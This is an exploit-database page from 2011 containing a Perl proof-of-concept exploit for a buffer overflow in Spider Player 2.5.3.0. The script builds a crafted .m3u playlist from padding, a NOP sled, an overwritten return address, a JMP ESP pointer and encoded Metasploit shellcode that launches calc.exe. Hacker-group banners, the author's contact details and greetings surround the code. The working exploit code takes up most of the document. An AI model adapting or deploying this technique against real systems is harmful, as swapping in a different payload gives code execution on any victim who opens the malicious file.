Home / exploits Spider Player 2.5.3.0 Buffer Overflow
Posted on 21 August 2011
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Spider Player v2.5.3.0 (.m3u) Buffer Overflow Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com # Home : Hassi.Messaoud (30008) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com # Facebook : http://facebook.com/KedAns # platform : windows # Impact : Buffer Overflow (in version 2.5.3.0) # Tested on : Windows XP SP3 (Fr) ## # [Indoushka & SeeMe & L0rd CrusAd3r] => Welcome back Br0ther's <3 ^^ <3 ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic | # | ------------------------------------------------ < | # + All Dz .. This is Open Group 4 L33T Dz Hax3rZ .. ### #----------------------[ Exploit Code ]----------------=> #!/usr/bin/perl #----------------- print " > Spider Player v2.5.3.0 (.m3u) Buffer Overflow Exploit < "; my $junk = "x41" x 31337; my $nops = "x90" x 55; my $buf = "x41x42x43x44" x 3 ; #----------------- # windows/exec - 511 bytes (http://www.metasploit.com) # Encoder: x86/alpha_mixed # EXITFUNC=process, CMD=calc.exe my $shellcode = "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" . "x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" . "x51x51x44x44x44x64x33x36x46x46x46x46x54x58" . "x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" . "x38x39x49x49x49x49x49x49x49x49x49x49x49x49" . "x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" . "x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" . "x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx49" . "x78x4cx49x45x50x43x30x47x70x45x30x4ex69x49" . "x75x50x31x49x42x43x54x4ex6bx43x62x46x50x4e" . "x6bx43x62x46x6cx4cx4bx42x72x44x54x4ex6bx50" . "x72x45x78x44x4fx4dx67x43x7ax45x76x46x51x4b" . "x4fx45x61x4fx30x4cx6cx47x4cx50x61x43x4cx44" . "x42x44x6cx47x50x4ax61x4ax6fx46x6dx47x71x4b" . "x77x4bx52x4cx30x43x62x51x47x4ex6bx51x42x44" . "x50x4cx4bx47x32x45x6cx47x71x48x50x4ex6bx51" . "x50x51x68x4cx45x4fx30x42x54x51x5ax43x31x48" . "x50x50x50x4ex6bx50x48x45x48x4cx4bx46x38x51" . "x30x47x71x4ax73x4bx53x47x4cx43x79x4ex6bx45" . "x64x4ex6bx43x31x49x46x44x71x49x6fx45x61x4f" . "x30x4cx6cx4bx71x48x4fx46x6dx47x71x4ax67x45" . "x68x49x70x51x65x4cx34x44x43x43x4dx4ax58x47" . "x4bx43x4dx46x44x50x75x4ax42x51x48x4cx4bx43" . "x68x51x34x43x31x4ax73x42x46x4cx4bx46x6cx42" . "x6bx4cx4bx50x58x45x4cx45x51x4ex33x4ex6bx45" . "x54x4ex6bx43x31x4ex30x4cx49x50x44x45x74x46" . "x44x43x6bx43x6bx43x51x42x79x42x7ax46x31x4b" . "x4fx49x70x51x48x51x4fx50x5ax4cx4bx45x42x4a" . "x4bx4dx56x51x4dx51x7ax43x31x4cx4dx4dx55x4c" . "x79x47x70x45x50x45x50x46x30x45x38x44x71x4c" . "x4bx50x6fx4ex67x49x6fx48x55x4dx6bx4ax50x4e" . "x55x49x32x43x66x42x48x4cx66x4cx55x4dx6dx4d" . "x4dx49x6fx4ex35x45x6cx47x76x43x4cx47x7ax4b" . "x30x49x6bx4dx30x43x45x43x35x4dx6bx51x57x46" . "x73x44x32x50x6fx42x4ax45x50x51x43x49x6fx4b" . "x65x51x73x43x51x42x4cx51x73x44x6ex50x65x44" . "x38x43x55x43x30x41x41"; #----------------- my $eip = "x7Cx91xE5x14x90x90"; # JL SHORT / IN EAX / NOP / NOP my $esp = "x07xd5xc5x7c"; # JMP ESP (shell32.dll) #----------------- $exploit = $junk.$nops.$eip.$buf."x90" x 11 .$esp.$shellcode; #----------------- print " [*] Creating Exploit File ... "; open($DZ ,">DzOffendersCr3w.m3u"); print $DZ $exploit; close($DZ); #----------------- print "[+] Exploit File Created (^_^) By KedAns-Dz ! "; #-------------------------[ End ]-----------------------<< # | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic | # | ------------------------------------------------ < | #================[ Exploited By KedAns-Dz * Inj3ct0r * ]========================================= # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * HMD 1850 BBs (all) # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu # gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * T0xic * www.packetstormsecurity.org * TreX (hotturks.org) # www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs .. # -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- # (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever # h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm # Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz #================================================================================================
